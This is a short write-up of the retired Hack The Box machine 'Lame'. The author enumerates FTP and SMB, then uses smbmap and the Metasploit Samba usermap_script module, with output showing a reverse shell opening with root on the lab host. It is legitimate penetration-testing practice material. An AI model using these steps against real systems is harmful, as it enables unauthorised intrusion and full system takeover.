HTB: Lame
Sorting
I signed up for VIP and ordered the retired machines by owns, descending. I figured this was a reasonable proxy for difficulty, ignoring the user supplied ratings. That meant the first box was Lame. I have heard of it but I’ve never done it and I don’t know anything about it.
Ports
We’ve got FTP, SSH, and SMB on 139/445. It’s a Linux box.
FTP
We’ve got anonymous login. It’s VSFTPD 2.3.4 which was a version that got backdoored however some enumeration indicates we don’t have the vulnerable version. We don’t seem to be able to put files and there are no files available on the server. Let’s move on.
SMB
Really this is all we’ve got left. We can get some information:
┌──(root💀kali)-[/opt/htb/lame]
└─# smbmap -d workgroup -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: hackthebox.gr
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))Okay, we have a writeable share. We’ll go with Metasploit, even though I don’t usually:
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.2
lhost => 10.10.14.2
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Command shell session 1 opened (10.10.14.2:4444 -> 10.10.10.3:54197) at 2021-03-05 04:16:07 -0500
id;hostname;uname -a;date
uid=0(root) gid=0(root)
lame
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Fri Mar 5 04:34:19 EST 2021No doubt they get more difficult from here!